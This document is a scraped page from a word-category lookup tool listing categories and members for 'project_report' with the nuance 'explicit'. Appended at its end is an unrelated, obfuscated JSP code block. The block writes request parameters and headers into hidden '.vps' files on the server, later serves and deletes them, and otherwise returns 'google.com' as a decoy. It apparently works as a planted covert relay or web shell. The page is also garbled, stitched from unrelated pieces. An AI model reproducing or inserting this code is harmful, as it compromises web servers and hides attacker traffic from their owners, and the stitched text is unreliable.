Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Categories for
project_report
with nuance
explicit
:
explicit:knowledge,
Simple categories matching
explicit
:
instrument,
process,
content,
knowledge,
map,
form,
document,
arrangement,
equation,
entity,
system,
rule,
information,
message,
communication,
investigation,
variable,
structure,
method,
statement,
regulation,
code,
representation,
characteristic,
abstraction,
source,
constraint,
concept,
interaction,
feature,
agreement,
service,
lyric,
event,
direction,
item,
language,
market,
support,
work,
quality,
indicator,
report,
links,
means,
philosophy,
attribute,
thing,
hindrance,
correspondence,
material,
criterion,
theory,
codification,
Members with property
explicit
:
text,
visual_content,
rule,
sentiment_survey,
convention,
benchmark,
geography,
overt_law,
law,
image,
announcement,
play,
policy,
suggestion,
video,
writing_technique,
structure,
balanced-budget_rule,
gap_data,
fact,
meeting,
lease,
manual,
strong_language,
work_rule,
search,
film,
category,
deduction,
process,
discussion,
restriction,
calendar,
property_law,
hypertext_links,
routine,
instruction_sheet,
registration,
claim,
dance,
instructions,
business_plan,
system,
book,
object,
guideline,
local_custom,
indicator,
manual_estimation,
frame,
word_document,
detailed_description,
email,
gesture,
formal_laws,
pointed_question,
decision_tree,
bondage_paraphernalia,
homemaker_service,
data,
opera,
pricing_accuracy,
implicit_information,
form,
dictionary,
project_report,
analogy,
health_service,
words,
transactions,
medium_report,
best_practice,
quadratic_formula,
voice,
game,
sex_toy,
writing_manual,
hi_remark,
soft_law,
database,
binary_chart,
painting,
pupil_text,
complaint,
theory,
city_name,
product_design,
legislative_enactment,
links,
mathematics,
euler_method,
processing_technique,
system_access,
pilot_data,
obscene_language,
product,
raising_demand,
established_convention,
precedent,
technical_report,
research,
usability_test,
setup_file,
client_report,
product_idea,
methodology,
organisational_system,
measurable_standard,
semantic_network,
tenancy_agreement,
function,
ip_option,
tool,
grading_guideline,
concession,
contract,
design,
feature_vector,
design_manual,
derogatory_language,
bonus_plan,
multiple_regression,
color,
product_specification,
aspect,
hypothesis,
product_technology,
demand,
instrumental_music,
technical_specification,
neural_net,
upstream_document,
note,
treaty,
preference_data,
water_demand,
commitment_line,
formula,
technology,
regulation,
profane_language,
washing_dish,
example,
story,
process_data,
sex,
information,
technology_transfer,
lesson_plan,
picture,
system_information,
plan,
operational_plan,
teacher,
song,
model,
lexical_information,
pornographic_material,
grant,
character,
internet_material,
computational_rule,
mission_statement,
invalidation,
budget,
relative_pronoun,
topography,
condition_precedent,
mt,
angle,
excessive_profanity,
information_exchange,
unique_theme,
product_data,
classification,
pass,
manufacturing_procedure,
text_message,
service,
online_help,
product_concept,
sexual_material,
scientific_data,
customer_list,
routine_report,
procedure_manual,
repeated_noun,
component,
trend_analysis,
business_report,
inventory,
standard,
formal_rule,
company,
algorithm,
security,
tcp,
usefulness,
data_analysis,
documentation,
procedure,
patent_portfolio,
order,
document,
language,
report,
scientific_breakthrough,
white_noise,
written_description,
reference_standard,
indicator_light,
plot,
flag,
cookbook_approach,
music_theory,
expert_identification,
loop,
profanity,
radius,
strike,
foreign_language,
cue_phrase,
shape,
light,
contact_organisation,
organisation,
event,
node,
text_label,
news,
drug_use,
marketing,
price,
request,
property_restriction,
decision,
service_concept,
hierarchical_structure,
land_value,
availability,
response,
software_buffer,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>